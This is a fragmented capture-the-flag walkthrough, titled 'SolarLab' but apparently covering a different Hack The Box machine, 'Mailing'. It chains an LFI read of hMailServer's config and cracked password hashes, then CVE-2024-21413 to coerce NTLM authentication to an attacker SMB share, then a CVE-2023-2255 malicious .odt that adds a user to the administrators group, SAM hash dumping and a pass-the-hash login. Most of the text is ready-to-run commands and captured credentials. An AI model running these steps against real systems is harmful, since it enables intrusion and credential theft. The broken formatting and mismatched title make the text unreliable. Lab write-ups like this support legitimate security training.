SolarLab
SolarLab - Medium Windows Box - Season 5 Anomalies.
There is a lot of open ports on this box. Some noteworthy highlights are the following ports:
hMailServer
.Wapiti3
.wapiti3
on our target we get an instant hit with `LFI` on the `/downloads` path.hMailServer
installed so lets see if we can find anything in that folder with the LFI
.INI
file that contains setup information for the server.[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
AdministratorPassword
841bb5acfa6779ae432fd7a4e6600ba7
rockyou.txt
word list on it. homenetworkingadministrator
0a9f8ad8bf896b501dde74f08efd7e4c
is proving to be more difficult. Decrypting the password with this tool gives us 6FC6F69152AD
. Though Im not sure what to do with it at this moment.
telnet boxIP 110
USER administrator@mailing.htb
PASS homenetworkingadministrator
LIST
RETR 1
administrator@mailing.htb
using the administrator password. But it appears theres nothing in the mailbox.Going back to the website we can see a download instructions
button at the bottom of the screen. It leads to a PDF you can download with instructions on how to connect to the mail server.
http://mailing.htb/download.php?file=instructions.pdf
Lets follow the instructions and setup thunderbird
on our Linux box to connect to the mailbox.
Using the found credentials for administrator : homenetworkingadministrator
lets sign into the mailbox.
Using the instructions PDF
we notice at the end we are to email maya@mailing.htb
to get a response from them. This is hinting at a responder attack
. Lets see where it goes.
Email maya@mailing.htb
:
My first email!
Hi Maya! This is my first mail.
responder
and catch the reply back. Lets see if we can get any hits. We probably need to send a malicious email that will cause Maya to reach back to our server.Looking around for hMailServer / outlook
vulnerabilities we stumble across a recent cve cve-2024-21413
that looks promising.
https://sploitus.com/exploit?id=425B7616-AF36-5AD0-912F-A6B7A45E41E6
We can use this CVE to send a bad email to Maya in hopes that when she clicks on the email it will cause them to reach back out to a SMB server
we have setup and we can catch that information on responder
.
sudo impacket-smbserver smbFolder $(pwd) -smb2support
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<boxip>\SMBSHARE' --subject XD
We managed to dump a NTLM hash cred for maya
.
m4y4ngs4ri
We can use this to evil-winrm
onto the box and get our foothold
evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'
Desktop
for the user flag.Exploring around we find an interesting app installed in `Program Files`.
LibreOffice
winPEAS
and not having much luck seeing any attack vector I was looking for vulnerable applications.7.4
We discover a cve related to this version of Libre Office.
https://www.libreoffice.org/about-us/security/advisories/CVE-2023-2255
We can escalate our local privileges to administrator using this exploit. Lets Proceed with attempts.
In affected versions of LibreOffice these floating frames fetch and display their linked document without prompt on loading the host document. Essentially you can load remote files
without the user being prompted that a file is being loaded.
We can use this PoC to generate a malicious payload to execute and gain us administrator access.
https://github.com/elweth-sec/CVE-2023-2255.git
.odt
file that injects the cmd
to add maya to local Administradores
group.python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'
Now that we crafted the payload we need to upload it to the victim. There is a suspicious `Important Documents` directory in `C:\` with nothing inside it. Lets upload it there.
Lets check maya
’s privileges before hand.
NOTICE: Its not Administrators
but Administradores
. its in portuguese. If you do Administrators (English)
it will not work!
maya
was added to the Administradores
group.localadmin
’s profile though we still are denied.Since we have administrator rights to maya
lets bust out one of our trusty windows tools crackmapexec
.
We are going to connect to the SMB we discovered in our Recon during initial engagement.
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
Using this command with the --sam
flag allows us to request from the SAM Database
and get hash passwords.
The --sam
flag requests the SAM database from the target if the credentials are valid and the user has the necessary permissions. This database is a critical part of Windows security, containing hashed passwords and other sensitive information.
localadmin
hash. Now we can perform a pass the hash
attack and remote into the box with this hash. localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
impacket-wmiexec localadmin@mailing.htb -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"
localadmin
on this box.